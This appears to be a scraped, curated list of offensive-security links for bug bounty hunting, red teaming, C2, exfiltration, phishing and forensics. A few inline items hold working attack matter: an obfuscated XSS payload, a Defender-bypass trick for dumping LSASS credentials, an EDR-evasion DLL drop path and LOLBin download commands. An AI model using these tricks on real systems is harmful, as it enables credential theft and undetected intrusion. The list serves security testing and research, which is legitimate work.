  curl -s URL | grep -Po "(\/)((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)*((?:[a-zA-Z\-_\:\.0-9\{\}]+))(\/)((?:[a-zA-Z\-_\/\:\.0-9\{\}]+))" | sort -u

• How I Might Have Hacked Any Microsoft Account
• BugBountyScanner: A Bash script and Docker image for Bug Bounty reconnaissance. Intended for headless use.
• alert() is dead, long live print()
• The Bug Bounty Reconnaissance Framework (BBRF) can help you coordinate your reconnaissance workflows across multiple devices
• If you do use BBRF, here it is a initial script to use HackerOne API to gather all programs' scope, including your private programs.
• KeyHacks is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.
• NotKeyHacks is the opposite of the KeyHacks repository by @streaak. Sensitive tokens are fun, but a lot of time is wasted reading documentation only to figure out that the token you found named AppSecret is, somehow, not sensitive at all and meant to be public. This repository is meant to be an inventory of those tokens that look potentially sensitive but aren't so that we can just CTRL-F and save a lot of time.
• Two Rights Might Make A Wrong
• You always hear stories about how bug bounty programs steal your bug, but very few people post about it, or have the 100% proof to show this.
• OOB reads in network message handlers leads to RCE
• Bug Bounty Resources
• Google Bug Hunters Welcome to Google's Bug Hunting community
• 0-Day Hunting (Chaining Bugs/Methodology)
• KingOfBugBounty Project: Our main goal is to share tips from some well-known bughunters. Using recon methodology, we are able to find subdomains, apis, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters..

Web Exploitation

• awesome-web-hacking: A list of web application security.
• gau: Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.
• malvun is the first website exclusively dedicated to the research of security vulnerabilities within Malware itself.
• Introducing CookieMonster: a tool for breaking stateless authentication. cokkiemonster
• get-title
• Insecure Direct Object References
• bugbounty-cheatsheet: A list of interesting payloads, tips and tricks for bug bounty hunters.
• Awesome Bug Bounty: A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups.
• ParamSpider: Mining parameters from dark corners of Web Archives.
• Server Side Request Forgery
• CRLF
• CRLF Injection
• crlf-injector: A CRLF ( Carriage Return Line Feed ) Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.
• CRLF Bruter: A simple tool to test for CRLF injection.
• CSV-Injection
• CSV Injection
• Command Injection
• Directory Traversal
• $4,000 Starbucks secondary context path traversal
• LFI
• kadimus: kadimus is a tool to check and exploit lfi vulnerability.
• fimap: is a little python tool which can find, prepare, audit, exploit and even google automaticly for local and remote file inclusion bugs in webapps.
• File Inclusion
• Open-Redirect
• RCE
• Crypto
• Template Injection
• SSTI
• XSLT
• Content Injection
• LDAP Injection
• NoSQL Injection
• IDOR
• ISCM
• OAuth
• XPATH Injection
• Bypass Upload Tricky
• Web Security CheatSheet
• Presenting The Pwning-Machine, a versatile and easy to setup Bug bounty environment.
• Zeus-Scanner: is an advanced reconnaissance utility designed to make web application reconnaissance simple. Zeus comes complete with a powerful built-in URL parsing engine, multiple search engine compatibility, the ability to extract URLs from both ban and webcache URLs, the ability to run multiple vulnerability assessments on the target, and is able to bypass search engine captchas.
• SQL Injection:
  • SQL injection
  • SQL Injection
  • Blind SQL injection
  • Dangerous Injections
  • Blind SQL Injection at fasteditor.hema.com
  • SQL Injection 101: How to Fingerprint Databases & Perform General Reconnaissance for a More Successful Attack
  • SQL injection cheat sheet
  • SQL Injection Cheat Sheet
  • The Ultimate SQL Injection Cheat Sheet
  • Examining the database in SQL injection attacks
  • Dumping a complete database using SQL injection
  • SQLi
  • SleuthQL: A SQL Injection Discovery Tool
  • Postgres SQL Injection Cheat Sheet
  • From SQL Injection to Shell: PostgreSQL edition
  • Pentesting PostgreSQL with SQL Injections
  • SQLite Injection
  • Blind SQL Injection Detection and Exploitation (Cheat Sheet)
  • SQLMap Cheat Sheet: 1, 2, 3, 4, tamper scripts
  • SQL injection: Improper handling of input during SQL query generation
• CSRF:
  • DNS Hijacking Attacks on Home Routers in Brazil
  • CSRF Injection
  • Bypassing CSRF tokens with Python’s CGIHTTPServer to exploit SQL injections
• HTTP Request Smuggling:
  • HRS - 𝐇𝐓𝐓𝐏 𝐑𝐞𝐪𝐮𝐞𝐬𝐭 𝐒𝐦𝐮𝐠𝐠𝐥𝐢𝐧𝐠 Attack. What, Why and How.
  • Practical Attacks Using HTTP Request Smuggling slides
  • HAProxy HTTP request smuggling (CVE-2019-18277)
  • The Powerful HTTP Request Smuggling
  • Smuggler: An HTTP Request Smuggling / Desync testing tool written in Python 3
  • HTTP.Request.Smuggling.Desync.Attack: HTTP request smuggling is a technique for interfering with the way of website process the sequences of HTTP requests that are received from one or more users.
  • h2c Smuggling: Request Smuggling Via HTTP/2 Cleartext (h2c)
  • HTTP Request Smuggler: This is an extension for Burp Suite designed to help you launch HTTP Request Smuggling attacks, originally created during HTTP Desync Attacks research.
  • Advanced request smuggling
• XSS:
  • Cross-site scripting (XSS) cheat sheet
  • Reflected XSS on www.hackerone.com via Wistia embed code
  • xss cheatsheet
  • Cross Site Scripting ( XSS ) Vulnerability Payload List
  • an XSS payload, Cuneiform-alphabet based

𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++],
𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀]
+(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀]
+𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()

• Portable Data exFiltration: XSS for PDFs repo

• Find reflected parameters with Burp_Suite

• How to solve a challenge from Intigriti in under 60 minutes

• XSS Hunter allows you to find all kinds of cross-site scripting vulnerabilities, including the often-missed blind XSS. The service works by hosting specialized XSS probes which, upon firing, scan the page and send information about the vulnerable page to the XSS Hunter service. xss hunter shortcut

• DalFox(Finder Of XSS) / Parameter Analysis and XSS Scanning tool based on golang

• CORS:

  • Security impact of a misconfigured CORS implementation
  • Which Security Risks Do CORS Imply?
  • Cross-Origin Resource Sharing (CORS)
  • How to win at CORS
  • CORS'ing a Denial of Service via cache poisoning

• SSRF:

  • SSRF Search & Destroy:
  • SSRF
  • SSRF Tips: some tips with Server Side Request Forgery.
  • Server Side Request Forgery on MISP: CVE-2020-28043.
  • SSRF (Server Side Request Forgery) worth $4,913 | My Highest Bounty Ever !
  • Unauthenticated Full-Read SSRF in Grafana: CVE-2020-13379
  • Server-Side Request Forgery using Javascript allows to exfill data from Google Metadata
  • Gf-Patterns: GF Paterns For (ssrf,RCE,Lfi,sqli,ssti,idor,url redirection,debug_logic, interesting Subs) parameters grep
  • Blind SSRF Chains by shubs
  • lorsrf: Bruteforcing on Hidden parameters to find SSRF vulnerability using GET and POST Methods.

• XXE:

  • Out of Band XXE in an E-commerce IOS app by Hack3rScr0lls
  • Comprehensive Guide on XXE Injection
  • XMLDecoder payload generator: A simple python script to generate XML payloads works for XMLDecoder based on ProcessBuilder and Runtime exec.
  • Enjoying my first blind xxe experience
  • XXE
  • dtd-finder: List DTDs and generate XXE payloads using those local DTDs.
  • New XML technique! Encode any DTD/XML inside an internal entity, and fly under WAF radars!
  • XXE_payloads
  • Advanced XXE Exploitation
  • Planilhas Baby, ssrf + ssti + xxe.

• Serialization:

  • ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
  • SerialVersionUID in Java
  • Java Serialization Magic Methods And Their Uses With Example
  • Apache Tomcat Deserialization of Untrusted Data RCE (CVE-2020–9484), Tomcat code: java/org/apache/naming/factory/BeanFactory.java - good to use for JRMI abuse
  • CVE-2020-9484-Mass-Scan
  • Exploiting JNDI Injections in Java
  • How to exploit Liferay CVE-2020-7961 : quick journey to PoC
  • How I Hacked Facebook Again! Unauthenticated RCE on MobileIron MDM
  • Serialization: the big threat
  • marshalsec: Turning your data into code execution
  • SerializationDumper: A tool to dump Java serialization streams in a more human readable form.
  • owaspsd-deserialize-my-shorts: Slide deck from OWASP SD Talk "Deserialize My Shorts: Or How I Learned to Start Worrying and Hate Java Object Deserialization"
  • Fear of the Unknown: A Metanalysis of Insecure Object Deserialization Vulnerabilities
  • Deserialization
  • FAR SIDES OF JAVA REMOTE PROTOCOLS
  • Serialization and deserialization in Java: explaining the Java deserialize vulnerability
  • Testing and exploiting Java Deserialization in 2021

• Orange: How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!

• code white | Blog: Liferay Portal JSON Web Service RCE Vulnerabilities

• GraphQL: Common vulnerabilities & how to exploit them. apis guru for graphql:  Represent any GraphQL API as an interactive graph.

• GraphQL security 101

• How to Insomnia for GraphQL requests

• InQL Scanner

• Debugging your GraphQL server was never this easy!

• GraphQL Voyager: 🛰️ Represent any GraphQL API as an interactive graph

• GraphQLmap: GraphQLmap is a scripting engine to interact with a graphql endpoint for pentesting purposes.

• GraphQL:

  • Queries and Mutations
  • GraphQL Injection
  • GraphQL: Common vulnerabilities & how to exploit them. apis guru for graphql:  Represent any GraphQL API as an interactive graph.
  • GraphQLmap: is a scripting engine to interact with a graphql endpoint for pentesting purposes.
  • RPC:
    • Breaking Protocol (Buffers): Reverse Engineering gRPC Binaries
    • ProtoFuzz: Google Protocol Buffers message generator
    • pbtk - Reverse engineering Protobuf apps: A toolset for reverse engineering and fuzzing Protobuf-based apps.
    • Online Protobuf Decoder.

• Orange: How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE!

• code white | Blog: Liferay Portal JSON Web Service RCE Vulnerabilities

• LazySSTICheck

• CSM_Pocs: Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices.

• DSSS, Damn Small SQLi Scanner is a fully functional SQL injection vulnerability scanner (supporting GET and POST parameters) written in under 100 lines of code.

• Garud: An automation tool that scans sub-domains, sub-domain takeover and then filters out xss, ssti, ssrf and more injection point parameters.

• httpx is a fast and multi-purpose HTTP toolkit allow to run multiple probers using retryablehttp library, it is designed to maintain the result reliability with increased threads.

• waybackurls: Fetch all the URLs that the Wayback Machine knows about for a domain

• Easily Identify Malicious Servers on the Internet with JARM

• Awesome Electron.js hacking & pentesting resources: A curated list of awesome resources about Electron.js (in)security.

• Turbo Search: The most powerfull Web Content Scanner

• Coordinated disclosure of XML round-trip vulnerabilities in Go’s standard library

• posta: 🐙 Cross-document Messaging security research tool. Cross document messaging is a very common communication method.

• JWT Vulnerabilities (Json Web Tokens). The JSON Web Token Toolkit v2

• Hacking Starbucks and Accessing Nearly 100 Million Customer Records

• Attacking Secondary Contexts in Web Applications

• OAuth 2.0 Hacking Simplified — Part 2 — Vulnerabilities and Mitigation

• Fugu API Tracker: The capabilities project, also known as Project Fugu, is a cross-company effort to make it possible for web apps to do anything iOS, Android, or desktop apps can, by exposing the capabilities of these platforms to the web while maintaining user security, privacy, trust, and other core tenets of the web.

• XS-Leaks: Cross-site leaks (aka XS-Leaks, XSLeaks) are a class of vulnerabilities derived from side-channels 1 built into the web platform. They take advantage of the web’s core principle of composability, which allows websites to interact with each other, and abuse legitimate mechanisms 2 to infer information about the user. One way of looking at XS-Leaks is to highlight their similarity with cross-site request forgery (CSRF 3) techniques, with the main difference being that instead of allowing other websites to perform actions on behalf of a user, XS-Leaks can be used to infer information about a user.

• Chrome extension to detect possible xsleaks

• Web Finder: tool that searchs IP addresses which answers some URL.

• Flask Unsign: Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys.

• jwt-pwn: Security Testing Scripts for JWT.

Burp Suite

• Burp Suite Cheat Sheet
• Burp Suite Academy
• REST Assured: Penetration Testing REST APIs Using Burp Suite:
  • Part 1 – Introduction & Configuration
  • Part 2 – Testing
  • Part 3 – Reporting
• Awesome Burp Extensions: A curated list of amazingly awesome Burp Extensions
• BurpSuiteHTTPSmuggler: A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques
• AutoRepeater: Automated HTTP Request Repeating With Burp Suite
• privatecollaborator: A script for installing private Burp Collaborator with free Let's Encrypt SSL-certificate
• Deploying a private Burp Collaborator server
• Burp Collaborator Server docker container with LetsEncrypt certificate: This repository includes a set of scripts to install a Burp Collaborator Server in a docker environment, using a LetsEncrypt wildcard certificate. The objective is to simplify as much as possible the process of setting up and maintaining the server.
• SELF-HOSTED BURP COLLABORATOR FOR FUN AND PROFIT: The Burp Suite Collaborator is a valuable tool for penetration testers and bug bounty hunters. It basically gives you unique subdomains and logs all interactions (DNS, HTTP(S), SMTP(S)) towards the subdomains. This can be used for example to detect SSRF-vulnerabilities and exfiltrate data.
• AES-Killer v3.0: Burp Plugin To Decrypt AES Encrypted Traffic Of Mobile Apps On The Fly
• Femida-xss: Automated blind-xss search for Burp Suite
• dotNetBeautifier: A BurpSuite extension for beautifying .NET message parameters and hiding some of the extra clutter that comes with .NET web apps (i.e. __VIEWSTATE).
• Java-Deserialization-Scanner: All-in-one plugin for Burp Suite for the detection and the exploitation of Java deserialization vulnerabilities.
• JavaSerialKiller: Burp extension to perform Java Deserialization Attacks.
• BurpBounty: Burp Bounty (Scan Check Builder in BApp Store) is a extension of Burp Suite that improve an active and passiv
• Howto install and use the Burp Suite as HTTPS Proxy on Ubuntu 14.04
• BurpExtension-WhatsApp-Decryption-CheckPoint
• InQL Scanner: A Burp Extension for GraphQL Security Testing.
• param-miner
• PII-Identifier: Burp Extension to identify PII data
• 403Bypasser: Burpsuite Extension to bypass 403 restricted directory
• API testing with Swurg for Burp Suite
• 403Bypasser
• Burp Bountycreate a Passive Profile for a param value, like testsqli and then create a Rule with this Profile to trigger SQLi active profile.
• Handling Short Expiration Time of Authorization Tokens
• BurpSuite-Team-Extension: This Burpsuite plugin allows for multiple web app testers to share their proxy history with each other in real time. Requests that comes through your Burpsuite instance will be replicated in the history of the other testers and vice-versa!
• ActiveScan++: ActiveScan++ Burp Suite Plugin.

Red Team

• Awesome Red Teaming
• DumpsterFire: "Security Incidents In A Box!" A modular, menu-driven, cross-platform tool for building customized, time-delayed, distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents, distractions, and lures to support and scale their operations. Build event sequences ("narratives") to simulate realistic scenarios and generate corresponding network and filesystem artifacts.
• Machine Learning for Red Teams, Part 1
• Flying under the radar: Hack into a „highly protected“ company without getting caught
• demiguise: HTA encryption tool for RedTeams
• Sn1per: Automated pentest framework for offensive security experts
• jenkins-shell: Automating Jenkins Hacking using Shodan API
• Red Team's SIEM: easy deployable tool for Red Teams used for tracking and alarming about Blue Team activities as well as better usability in long term operations.
• The-Hacker-Playbook-3-Translation: 对 The Hacker Playbook 3 的翻译。
• How Do I Prepare to Join a Red Team?
• Red Team & Physical Entry Gear
• Red Team Techniques: Gaining access on an external engagement through spear-phishing
• Phantom Tap (PhanTap): an ‘invisible’ network tap aimed at red teams.
• So You Want to Run a Red Team Operation: I built a red team for a Forbes 30 company, and now I am sharing some pointers to help you build one in your organization.
• Alternative C2 for Red Teamers: Koadic Command & Control Framework. Koadic C3 COM Command & Control - JScript RAT
• tunning tip: if you plan to drop a dll and load directly via macro from within office (winword or excel), use the following path %localappdata%\assembly\tmp<rand>\a.b.c.dll (it's a busy tmp folder and I doubt EDRs will notify on every file creation in that folder)
• In-Memory-Only ELF Execution (Without tmpfs): In which we run a normal ELF binary on Linux without touching the filesystem (except /proc).
• A Red Teamer's guide to pivoting
• caldera: Automated Adversary Emulation.
• BankSecurity - Red_Team: Some scripts useful for red team activities
• FIN6 Adversary Emulation
• Red-Teaming-Toolkit: A collection of open source and commercial tools that aid in red team operations.
• RedFile: A flask wsgi application that serves files with intelligence, good for serving conditional RedTeam payloads
• Choose Your Own Red Team Adventure
• Red Tip #415: STATUS_PASSWORD_MUST_CHANGE when trying an AD account? Use “smbpasswd -r domain.fqdn -U username” to change the password so you can use the account.
• Red Team Tactics: Hiding Windows Services
• AQUARMOURY: This is a tool suite consisting of miscellaneous offensive tooling aimed at red teamers/penetration testers to primarily aid in Defense Evasion TA0005
• Prelude Operator: is the first intelligent and autonomous platform built to attack, defend and train your critical assets through continuous red teaming. repo
• 0xsp Mongoose Red for Windows: a unique framework for cybersecurity simulation and red teaming operations, windows auditing for newer vulnerabilities, misconfigurations and privilege escalations attacks, replicate the tactics and techniques of an advanced adversary in a network.
• Macrome: Excel Macro Document Reader/Writer for Red Teamers & Analysts
• FireEye Red Team Tool Countermeasures and Mandiant SunBurst Countermeasures.
• wifipumpkin3: Powerful framework for rogue access point attack.
• The worst of the two worlds: Excel meets Outlook
• redcanaryco/AtomicTestHarnesses: Public Repo for Atomic Test Harness
• pivoting cheat sheet
• Self-hosting Your Red Team Payloads: pwndrop: Self-deployable file hosting service for red teamers, allowing to easily upload and share payloads over HTTP and WebDAV.
• Boomerang is a tool to expose multiple internal servers to web/cloud. Agent & Server are pretty stable and can be used in Red Team for Multiple levels of Pivoting and exposing multiple internal services to external/other networks.
• Mythic: A collaborative, multi-platform, red teaming framework.
• Alan Framework: A post-exploitation framework.
• Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams
• Red Teaming/Adversary Simulation Toolkit
• Wiki to collect Red Team infrastructure hardening resources.
• Red Team development and operations: A PRACTICAL GUIDE TO RED TEAM OPERATIONS, WRITTEN BY: JOE VEST AND JAMES TUBBERVILLE
• VECTR is a tool that facilitates tracking of your red and blue team testing activities to measure detection and prevention capabilities across different attack scenarios.
• Mortar Loader: evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR).
• RedTeam-Tools: Tools and Techniques for Red Team / Penetration Testing.

Command & Control (C2)

• Cobalt Strike: is software for Adversary Simulations and Red Team Operations. 4.2 release notes
• CrossC2: generate CobaltStrike's cross-platform payload
• Cobalt-Strike-CheatSheet: Some notes and examples for cobalt strike's functionality
• Introducing community kit
• Octopus: Open source pre-operation C2 server based on python and powershell Cobalt Strike Community Kit
• Covenant: Covenant is a collaborative .NET C2 framework for red teamers.
• Building C2 Implants in C++: A Primer
• tc2: treafik fronted c2 examples
• ToRat: is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication.
• Python Backdoor Talking to a C2 Through Ngrok
• Silver: Implant framework
• Cobalt Strike Beacon Injected into werfault.exe =======
• PoshC2: is a proxy aware C2 framework used to aid penetration testers with red teaming, post-exploitation and lateral movement. Native macOS Implants
• pyMalleableC2: Python interpreter for Cobalt Strike Malleable C2 Profiles. Allows you to parse, build and modify them programmatically.
• link: is a command and control framework written in rust.
• Cobalt Strike: Using Known Private Keys To Decrypt Traffic – Part 1
• THIRD STEP IN SETTING UP C2 ENVIRONMENT. USING SOCAT AS FRONT TO MERLIN. COMMAND AND CONTROL MY WAY.
• Detecting CONTI CobaltStrike Lateral Movement Techniques - Part 2
• melting-cobalt: A Cobalt Strike Scanner that retrieves detected Team Server beacons into a JSON object.
• 面向iOS攻击的beacon生成: command & control on iOS

Purple Team

• Purple Cloud: An Infrastructure as Code (IaC) deployment of a small Active Directory pentest lab in the cloud. The deployment simulates a semi-realistic corporate enterprise Active Directory with a DC and endpoints. Purple team goals include blue team detection capabilities and R&D for detection engineering new approaches. On kiploit
• PRO TIP when looking through logs on Windows. Use WEVTUTIL.exe

DNS

• dnstwist
• Plight At The End Of The Tunnel
• dref: DNS Rebinding Exploitation Framework
• dns-rebind-toolkit: A front-end JavaScript toolkit for creating DNS rebinding attacks.
• Bypass firewalls by abusing DNS history: Firewall bypass script based on DNS history records. This script will search for DNS A history records and check if the server replies for that domain. Handy for bugbounty hunters.
• dnstwist: Domain name permutation engine for detecting typo squatting, phishing and corporate espionage
• Can I take over XYZ?: a list of services and how to claim (sub)domains with dangling DNS records.
• SubR3con: is a script written in python. It uses Sublist3r to enumerate all subdomains of specific target and then it checks for stauts code for possible subdomain takeover vulnerability. This works great with Subover.go
• TakeOver-v1: script extracts CNAME record of all subdomains at once. TakeOver saves researcher time and increase the chance of finding subdomain takeover vulnerability.
• subzy: Subdomain takeover vulnerability checker.
• Subdomain Takeover Scanner
• subdomain-takeover: SubDomain TakeOver Scanner by 0x94.
• DNSCrypt is a protocol that authenticates communications between a DNS client and a DNS resolver. It prevents DNS spoofing. It uses cryptographic signatures to verify that responses originate from the chosen DNS resolver and haven’t been tampered with. dnscrypt-proxy 2, resolvers and docker image.
• pdns-qof: Passive DNS Common Output Format.
• dnsdbq: DNSDB API Client, C Version.
• DNS Logging:
  • How to enable bind query logging to find out Who’s Querying a Name Server
  • BIND Logging - some basic recommendations
  • BIND 9 logging best practices
  • BIND9 Configuration Guide
  • Thwarting and detecting malware with RPZ and OSSEC
  • The Importance of DNS Logging in Enterprise Security
• DNSObserver: A handy DNS service written in Go to aid in the detection of several types of blind vulnerabilities. It monitors a pentester's server for out-of-band DNS interactions and sends lookup notifications via Slack. Discover Blind Vulnerabilities with DNSObserver: an Out-of-Band DNS Monitor
• Unbound DNS Blacklist
• subjack: Subdomain Takeover tool written in Go
• sad dns: The attack allows an off-path attacker to inject a malicious DNS record into a DNS cache (e.g., in BIND, Unbound, dnsmasq).
• dog: Command-line DNS client
• NtHiM: Now, the Host is Mine! - Super Fast Sub-domain Takeover Detection!
• Passive DNS - Common Output Format improving internet wide scanning with dynamic scanning
• DNS loophole makes nation-state level spying as easy as registering a domain Dynamic DNS Leakage Tester

Exfiltration

• Script for searching the extracted firmware file system for goodies!
• DKMC - Dont kill my cat: Malicious payload evasion tool
• Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.
• gitleaks: Searches full repo history for secrets and keys
• Twitter Scraper
• tinfoleak (github):The most complete open-source tool for Twitter intelligence analysis
• Social IDs: Get user ids from social network handlers
• SpookFlare: Meterpreter loader generator with multiple features for bypassing client-side and network-side countermeasures.
• Photon: Incredibly fast crawler which extracts urls, emails, files, website accounts and much more.
• Extracting data from an EMV (Chip-And-Pin) Card with NFC technology
• accountanalysis: This tool enables you to evaluate Twitter accounts. For example how automated they are, how many Retweets they post, or which websites they link to most often.
• How to get authentication key from SNMPv3 packets
• AtomicTestsCommandLines.txt: Atomic Tests - All Command Lines - Replace Input Arguments #{input_argument} - More Soon
• whois | GTFOBins: hangs waiting for the remote peer to close the socket. github, GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
• ssh-keygen can be used to load shared libraries
• Browsers affected by the History API DoS
• PacketWhisper: Stealthily Exfiltrate Data And Defeat Attribution Using DNS Queries And Text-Based Steganography. PacketWhisper: Stealthily exfiltrate data and defeat attribution using DNS queries and text-based steganography. Avoid the problems associated with typical DNS exfiltration methods. Transfer data between systems without the communicating devices directly connecting to each other or to a common endpoint. No need to control a DNS Name Server.
• Using Google Analytics for data extraction
• Exfiltrating credentials via PAM backdoors & DNS requests
• Building simple DNS endpoints for exfiltration or C&C
• CheckPlease: Sandbox evasion modules written in PowerShell, Python, Go, Ruby, C, C#, Perl, and Rust.
• okhttp-peer-certificate-extractor: This tool extracts peer certificates from given certificates.
• DET: (extensible) Data Exfiltration Toolkit (DET)
• awesome-python-login-model: login access for webscrapping.
• Hamburglar: collect useful information from urls, directories, and files.
• Giggity: grab hierarchical data about a github organization, user, or repo.
• Living Off The Land Binaries and Scripts (and also Libraries) - github
• Windows TCPIP Finger Command: C2 Channel and Bypassing Security Software
• Living Off Windows Land – A New Native File “downldr”
• Ttdinject.exe: Used by Windows 1809 and newer to Debug Time Travel (Underlying call of tttracer.exe)
• Exfiltrate Like a Pro: Using DNS over HTTPS as a C2 Channel
• Awesome Asset Discovery: List of Awesome Asset Discovery Resources
• Cloakify-Factory:: A Data Exfiltration Tool Uses Text-Based Steganography. Cloakify: Data Exfiltration & Infiltration In Plain Sight; Convert any filetype into list of everyday strings, using Text-Based Steganography; Evade DLP/MLS Devices, Defeat Data Whitelisting Controls, Social Engineering of Analysts, Evade AV Detection.
• hakrawler: Simple, fast web crawler designed for easy, quick discovery of endpoints and assets within a web application. A Fast Web Crawler for Hackers
• Chameleon: A tool for evading Proxy categorisation.
• DNSExfiltrator: Data exfiltration over DNS request covert channel
• Data Exfiltration using Linux Binaries
• Exploring the WDAC Microsoft Recommended Block Rules: kill.exe. lolbin/lolbas
• MSOXMLED.EXE - Desperate downloader
• LOLBIN/LOLBAS:
  • Exploring the WDAC Microsoft Recommended Block Rules: kill.exe. lolbin/lolbas
  • I found a way to download arbitrary files with AppInstaller.exe (signed by MS). start ms-appinstaller://?source= lolbin/lolbas
  • C:\Windows\System32\Cmdl32.exe
  • I shot the sigverif.exe – the GUI-based LOLBin Sigverif.exe
  • \http://live.sysinternals.com\tools\PsExec.exe -s -c cmd.exe
  • Need to download mimikatz (or some other nasty stuff) without alerting Windows Defender Antivirus?
  • C:\Windows\System32\WorkFolders.exe
  • C:\Windows\System32\certoc.exe -LoadDLL <DLLName>
  • if you rename procdump.exe to dump64.exe and place it in the "C:\Program Files (x86)\Microsoft Visual Studio*" folder, you can bypass Defender and dump LSASS.
• Back in a Bit: Attacker Use of the Windows Background Intelligent Transfer Service BitsParser
• Living off the land
• It's not a forgotten legacy code, it's recidivism: tpmtool drivetracing.

Steganography

• A list of useful tools and resources.
• steghide: is a steganography program that is able to hide data in various kinds of image- and audio-files.
• stegsolve.
• Unicode Text Steganography Encoders/Decoders
• StegCracker: Steganography brute-force utility to uncover hidden data inside files.
• Simple Image Steganography in Python
• How To Hide Data in Images Using Python
• Aperi'Solve is an online platform which performs layer analysis on image. The platform also uses zsteg, steghide, outguess, exiftool, binwalk, foremost and strings for deeper steganography analysis.
• Stegseek: Worlds fastest steghide cracker, chewing through millions of passwords per second

Phishing

• Phishing on Twitter
• evilginx2: Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication.
• shellphish: Phishing Tool for 18 social media: Instagram, Facebook, Snapchat, Github, Twitter, Yahoo, Protonmail, Spotify, Netflix, Linkedin, Wordpress, Origin, Steam, Microsoft, InstaFollowers, Gitlab, Pinterest
• pompa: Fully-featured spear-phishing toolkit - web front-end.
• ..Modlishka..: Modlishka is a flexible and powerful reverse proxy, that will take your phishing campaigns to the next level (with minimal effort required from your side).
• Using phishing tools against the phishers — and uncovering a massive Binance phishing campaign.
• Lure: User Recon Automation for GoPhish
• PhishingKitTracker: An extensible and freshly updated collection of phishingkits for forensics and future analysis topped with simple stats.
• SimplyTemplate: Phishing Template Generation Made Easy.
• Compromising operating systems through fake software updates. Using: evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates.
• MurmurHash: This little tool is to calculate a MurmurHash value of a favicon to hunt phishing websites on the Shodan platform.
• SniperPhish: The Web-Email Spear Phishing Toolkit
• King Phisher: Phishing Campaign Toolkit
• phishing-frenzy: Ruby on Rails Phishing Framework.
• gophish: Open-Source Phishing Toolkit
• Phishing 101: why depend on one suspicious message subject when you can use many?
• Widespread credential phishing campaign abuses open redirector links
• ThePhish: an automated phishing email analysis tool

Forensics

• Cracking Linux Full Disk Encryption (LUKS) with hashcat - The Forensic way!
• O-Saft: OWASP SSL advanced forensic tool
• PcapXray - A Network Forensics Tool - To visualize a Packet Capture offline as a Network Diagram including device identification, highlight important communication and file extraction
• swap_digger is a tool used to automate Linux swap analysis during post-exploitation or forensics
• The Sleuth Kit® (TSK) is a library and collection of command line digital forensics tools that allow you to investigate volume and file system data
• Invoke-LiveResponse
• Linux Forensics
• CDQR: The Cold Disk Quick Response (CDQR) tool is a fast and easy to use forensic artifact parsing tool that works on disk images, mounted drives and extracted artifacts from Windows, Linux and MacOS devices
• mac_apt: macOS Artifact Parsing Tool
• MacForensics: Repository of scripts for processing various artifacts from macOS (formerly OSX).
• imago-forensics: Imago is a python tool that extract digital evidences from images.
• remedi-infrastructure: setup and deployment code for setting up a REMEDI machine translation cluster
• Tsurugi Linux is a new DFIR open source project that is and will be totally free, independent without involving any commercial brand
• libelfmaster: Secure ELF parsing/loading library for forensics reconstruction of malware, and robust reverse engineering tools
• usbrip (derived from "USB Ripper", not "USB R.I.P." 😲) is an open source forensics tool with CLI interface that lets you keep track of USB device artifacts (aka USB event history, "Connected" and "Disconnected" events) on Linux machines.
• Digital Forensics and Incident Response: This post is inspired by all the hard working DFIR, and more broadly security professionals, who have put in the hard yards over the years to discuss in depth digital forensics and incident response.
• KAPE - Kroll Artifact Parser And Extractor: Find, collect and process forensically useful artifacts in minutes. blog post. KAPE docs and KAPE Files
• AVML(Acquire Volatile Memory for Linux).
• turbinia: Automation and Scaling of Digital Forensics Tools
• Eric Zimmerman's Tools
• MacQuisition: A powerful, 4-in-1 forensic imaging software solution for Macs for triage, live data acquisition, targeted data collection, and forensic imaging.
• Kuiper: Digital Forensics Investigation Platform
• file Signatures:
• PowerForensics: PowerForensics provides an all in one platform for live disk forensic analysis. Powershell
• OfficeForensicTools: A set of tools for collecting forensic information.
• FBI Electronic Tip For
• CHIRP: A forensic collection tool written in Python.
• Hash Cracking with AWS and hashcat
• Hashcat new feature: autodetect hash-mode
• L0phtCrack is a password auditing and recovery application originally produced by Mudge from L0pht Heavy Industries. It is used to test password strength and sometimes to recover lost Microsoft Windows passwords, by using dictionary, brute-force, hybrid attacks, and rainbow tables. gitlab repo
• Foremost: is a console program to recover files based on their headers, footers, and internal data structures. This process is commonly referred to as data carving. Foremost can work on image files, such as those generated by dd, Safeback, Encase, etc, or directly on a drive. The headers and footers can be specified by a configuration file or you
• TrID: is an utility designed to identify file types from their binary signatures. While there are similar utilities with hard coded logic, TrID has no fixed rules. Instead, it's extensible and can be trained to recognize new formats in a fast and automatic way.
• image-unshredding: Image unshredding using a TSP solver.
• Linux Incident Response Guide
